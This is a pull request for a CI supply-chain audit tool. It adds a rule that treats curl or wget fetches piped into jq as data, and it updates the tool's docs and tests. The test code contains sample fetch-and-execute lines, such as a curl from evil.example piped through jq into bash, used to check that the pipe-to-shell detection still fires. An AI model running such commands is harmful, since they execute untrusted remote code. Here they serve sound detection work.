### PR TITLE
feat(audit): treat fetches piped to jq as data, not code

### DIFF
--- a/.pinprick.toml
+++ b/.pinprick.toml
@@ -1,9 +1,0 @@
-# Hosts whose unversioned URL fetches are recorded as allowed matches.
-# Pinprick still records the match (visible under `--verbose`); it just
-# does not surface as a finding.
-#
-# - crates.io: the bump-cargo-tools workflow queries the registry API to
-#   resolve the latest stable version of each cargo-installed lint tool.
-#   Bad data from crates.io would only result in a reviewable PR being
-#   opened against `ci.yml`, not direct exploitation.
-trusted-hosts = ["crates.io"]

--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -91,6 +91,8 @@ URL "versioned" heuristic: a URL is considered versioned if any path segment mat
 
 Data-format exemption: unversioned-URL rules (shell, JS, Python) do **not** fire when the URL's path ends in a data-format extension (`.json`/`.jsonl`/`.ndjson`, `.yaml`/`.yml`/`.toml`, `.csv`/`.tsv`/`.xml`, `.txt`/`.md`/`.rst`). Matches are recorded as allowed (visible under `--verbose`) with reason `data format URL`. Applies only to the unversioned-URL rules — `/latest/` URLs, pipe-to-shell, and `gh release download` without a tag still fire regardless of extension. `.html` and `.svg` are intentionally excluded because both can carry embedded scripts.
 
+Piped-to-jq exemption: an unversioned-URL fetch whose line pipes into `jq` is recorded as allowed with reason `piped to jq` — the same data-not-code rationale as the data-format exemption, but for JSON API endpoints that carry no file extension (e.g. `curl …/api/v1/crates/<x> | jq …`). The `jq\b` match keeps `jqfoo` from qualifying. Pipe-to-shell matches and pre-empts the URL rules, so `curl … | jq … | bash` is flagged high, never exempted.
+
 Checksum verification: findings followed within 3 lines by `sha256sum`, `shasum`, `openssl dgst`, `gpg --verify`, or `Get-FileHash` are downgraded one severity level. Pipe-to-shell findings are exempt — the piped payload is never written to disk, so a nearby checksum command cannot verify it.
 
 Git clone ref pinning: `git clone` without `--branch`/`-b` or with a branch name (main, develop, feature/foo) is flagged medium severity. `--branch v1.2.3` (version-like ref) suppresses the finding. A `git checkout <40-char-SHA>` within 3 lines fully suppresses the finding (recorded as allowed, visible under `--verbose`), since the SHA checkout deterministically pins the repo content.

--- a/README.md
+++ b/README.md
@@ -125,7 +125,7 @@ HIGH  .github/workflows/ci.yml:42
 
 Without a GitHub token, audit scans local `run:` blocks only. With a token (via `GITHUB_TOKEN` or `gh auth`), it also fetches and scans action source code — JavaScript, Python, Dockerfiles, and composite action steps.
 
-Pass `--sarif` to emit SARIF 2.1.0 for upload to [GitHub code scanning](https://docs.github.com/en/code-security/code-scanning). Pass `--verbose` to see every match, including ones that passed the version check or were downgraded to an allowed match by the trusted-host or data-format rules.
+Pass `--sarif` to emit SARIF 2.1.0 for upload to [GitHub code scanning](https://docs.github.com/en/code-security/code-scanning). Pass `--verbose` to see every match, including ones that passed the version check or were downgraded to an allowed match by the trusted-host, data-format, or jq-pipe rules.
 
 ### Configuration
 
@@ -189,7 +189,7 @@ Cache cleaned.
 
 Pipe-to-shell is flagged even when the URL is versioned — a piped payload is never written to disk, so it cannot be checksum-verified and the versioned path pins the URL but not the content.
 
-Unversioned-URL rules don't fire when the URL's path ends in a data-format extension (`.json`, `.yaml`, `.toml`, `.csv`, etc.) — the payload is consumed as data, not executed. These matches are only visible under `--verbose`.
+Unversioned-URL rules don't fire when the URL's path ends in a data-format extension (`.json`, `.yaml`, `.toml`, `.csv`, etc.), or when the fetch is piped into `jq` — the payload is consumed as data, not executed. These matches are only visible under `--verbose`. (Pipe-to-shell takes precedence, so `curl … | jq … | bash` is still flagged.)
 
 Findings followed by checksum verification (`sha256sum`, `gpg --verify`, etc.) within 3 lines are downgraded one severity level. Pipe-to-shell findings are exempt.
 

--- a/site/src/content/docs/reference/detections.md
+++ b/site/src/content/docs/reference/detections.md
@@ -578,6 +578,18 @@ The exemption applies only to the _unversioned-URL_ rules. `/latest/` URLs, pipe
 
 The list can be extended via `extra-data-formats` in [`.pinprick.toml`](/configuration/config-file#extra-data-formats) to add project-specific extensions (e.g., `.proto`, `.graphql`).
 
+## Piped-to-`jq` exemption
+
+A `curl`/`wget` whose output is piped into `jq` is recorded as an allowed match with reason `piped to jq` rather than emitted as a finding — even when the URL has no data-format extension. `jq` parses JSON and errors on anything else, so the fetched bytes are consumed as data, never executed.
+
+This covers the case the [data-format exemption](#data-format-exemption) misses: a REST API endpoint that returns JSON but carries no `.json` in its path. Resolving the latest release of a crate from the registry API is a real example:
+
+```sh
+curl -fsSL "https://crates.io/api/v1/crates/ripgrep" | jq -r '.crate.max_stable_version'
+```
+
+**Pipe-to-shell still takes precedence.** A `curl … | jq -r .url | bash` line is flagged as pipe-to-shell (high severity) before this exemption is considered — routing a fetch through `jq` on its way to a shell does not make it safe. This exemption needs no configuration; it is always on.
+
 ## Trusted hosts exemption
 
 Unversioned-URL rules are downgraded to allowed matches when the URL host matches an entry in the user's [`trusted-hosts`](/configuration/config-file#trusted-hosts) list. Configured via `.pinprick.toml`:
@@ -601,7 +613,7 @@ When a finding is intentional and you want `pinprick audit` to stop flagging it,
 
 There are two distinct outcomes to be aware of:
 
-- **Allowed match** — the rule still matched, but the finding is recorded as allowed instead of emitted. Visible under `--verbose` with a reason, so a reviewer auditing the audit can still see what fired. Used by [`trusted-hosts`](#trusted-hosts), [`extra-data-formats`](#extra-data-formats), the [versioned-URL heuristic](#versioned-url-heuristic), the [data-format exemption](#data-format-exemption), and the [audited-actions list](/commands/audit#audited-actions-list).
+- **Allowed match** — the rule still matched, but the finding is recorded as allowed instead of emitted. Visible under `--verbose` with a reason, so a reviewer auditing the audit can still see what fired. Used by [`trusted-hosts`](#trusted-hosts), [`extra-data-formats`](#extra-data-formats), the [versioned-URL heuristic](#versioned-url-heuristic), the [data-format exemption](#data-format-exemption), the [piped-to-`jq` exemption](#piped-to-jq-exemption), and the [audited-actions list](/commands/audit#audited-actions-list).
 - **Removed finding** — the finding is dropped from the report entirely and is not visible under `--verbose`. Used by [`ignore.patterns`](#ignorepatterns), [`ignore.actions`](#ignoreactions), and [`severity`](#severity-threshold).
 
 :::tip[Prefer allowed matches over removed findings]

--- a/src/audit.rs
+++ b/src/audit.rs
@@ -874,6 +874,8 @@ fn check_url_patterns(
                 allowed_reason.get_or_insert(REASON_TRUSTED_HOST);
             } else if config.is_data_format_exempt(url) {
                 allowed_reason.get_or_insert("data format URL");
+            } else if audit_patterns::fetch_piped_to_jq(line) {
+                allowed_reason.get_or_insert("piped to jq");
             } else {
                 dangerous = true;
                 break;
@@ -1648,6 +1650,41 @@ more stuff
             &DEFAULT_CONFIG,
         );
         assert_eq!(c.findings.len(), 1);
+    }
+
+    #[test]
+    fn shell_scan_fetch_piped_to_jq_is_allowed_not_finding() {
+        // The crates.io registry query from bump-cargo-tools.yml: an
+        // extensionless JSON API piped to jq. Data, not code — no config needed.
+        let mut c = AuditCollector::new(true);
+        scan_shell_content(
+            r#"LATEST=$(curl -fsSL -H "$UA" "https://crates.io/api/v1/crates/${TOOL}" | jq -r '.crate.max_stable_version')"#,
+            "test.sh",
+            1,
+            "",
+            &mut c,
+            &DEFAULT_CONFIG,
+        );
+        assert!(c.findings.is_empty());
+        assert_eq!(c.allowed.len(), 1);
+        assert_eq!(c.allowed[0].reason, "piped to jq");
+    }
+
+    #[test]
+    fn shell_scan_fetch_to_jq_then_shell_is_still_pipe_to_shell() {
+        // jq anywhere in the pipeline must not downgrade a fetch that ends at a
+        // shell — pipe-to-shell pre-empts and fires its own finding.
+        let mut c = AuditCollector::new(false);
+        scan_shell_content(
+            "curl -fsSL https://evil.example/c | jq -r .cmd | bash",
+            "test.sh",
+            1,
+            "",
+            &mut c,
+            &DEFAULT_CONFIG,
+        );
+        assert_eq!(c.findings.len(), 1);
+        assert!(c.findings[0].description.contains("piped to shell"));
     }
 
     #[test]

--- a/src/audit_patterns.rs
+++ b/src/audit_patterns.rs
@@ -401,6 +401,22 @@ pub fn has_checksum_verify(line: &str) -> bool {
     CHECKSUM_VERIFY.is_match(line)
 }
 
+// ── Fetch-to-jq detection ───────────────────────────────────────────────────
+
+// A pipe into `jq`. The trailing `\b` keeps `jqfoo` (and a path-qualified
+// `| /usr/bin/jq`, deliberately) from matching — erring toward flagging.
+re!(SH_PIPE_JQ, r"\|\s*jq\b");
+
+/// Whether a line pipes a fetch into `jq`. `jq` parses JSON and errors on
+/// anything else, so the fetched bytes are data, not executable code — the same
+/// rationale as the data-format-extension exemption, but for an API endpoint
+/// that carries no file extension (e.g. `https://crates.io/api/v1/crates/<x>`).
+/// Pipe-to-shell matches and pre-empts the URL rules, so a
+/// `curl … | jq … | bash` line never reaches this check.
+pub fn fetch_piped_to_jq(line: &str) -> bool {
+    SH_PIPE_JQ.is_match(line)
+}
+
 // ── URL version detection ───────────────────────────────────────────────────
 
 // Requires at least one dotted component (e.g. `v1.2`, `1.2.3`) so that a
@@ -1409,6 +1425,44 @@ mod tests {
     #[test]
     fn pipe_multi_stage_without_shell_not_matched() {
         assert!(!SH_PIPE_SHELL.is_match("curl https://api.example.com/data | jq . | tee out.json"));
+    }
+
+    #[test]
+    fn pipe_shell_jq_then_shell_still_matched() {
+        // `jq` in the pipeline must not make a fetch that ultimately reaches a
+        // shell look safe — pipe-to-shell still fires (and pre-empts the jq
+        // data-fetch exemption).
+        assert!(SH_PIPE_SHELL.is_match("curl https://x.example/c | jq -r .url | bash"));
+    }
+
+    // ── fetch_piped_to_jq ──────────────────────────────────────────────
+
+    #[test]
+    fn fetch_piped_to_jq_matches() {
+        assert!(fetch_piped_to_jq(
+            r#"curl -fsSL "https://crates.io/api/v1/crates/typos-cli" | jq -r '.crate.max_stable_version'"#
+        ));
+        assert!(fetch_piped_to_jq(
+            "curl https://api.example.com/data | jq ."
+        ));
+        // No space after the pipe.
+        assert!(fetch_piped_to_jq(
+            "wget -qO- https://api.example.com/data |jq"
+        ));
+    }
+
+    #[test]
+    fn fetch_piped_to_jq_rejects_non_jq() {
+        assert!(!fetch_piped_to_jq(
+            "curl https://example.com/install.sh -o install.sh"
+        ));
+        assert!(!fetch_piped_to_jq(
+            "curl https://api.example.com/d | grep foo"
+        ));
+        // `jq` must be a whole word, not a prefix of another command.
+        assert!(!fetch_piped_to_jq(
+            "curl https://api.example.com/d | jqlang"
+        ));
     }
 
     #[test]


### PR DESCRIPTION
Teaches the audit that a `curl`/`wget` piped into `jq` is a data fetch, not a code fetch: it's recorded as an allowed match (reason `piped to jq`) instead of an unversioned-URL finding, since `jq` parses JSON and errors on anything else. This is the same data-not-code rationale as the existing data-format-extension exemption, extended to JSON API endpoints that carry no `.json` in their path. Pipe-to-shell is still matched first, so `curl … | jq … | bash` stays a high-severity finding and is never exempted.

The motivation is a false positive against the audit's own threat model: a registry metadata query like `curl …/api/v1/crates/<x> | jq -r .max_stable_version` pulls a version string, not code, yet tripped the unversioned-fetch rule. pinprick's own repo had been carrying a `trusted-hosts = ["crates.io"]` exception to pass its self-audit — this removes that exception, since the heuristic now handles the case directly and the repo needs no audit carve-outs of its own. Includes unit and scan-level tests, and updates the detections reference, README, and project docs.
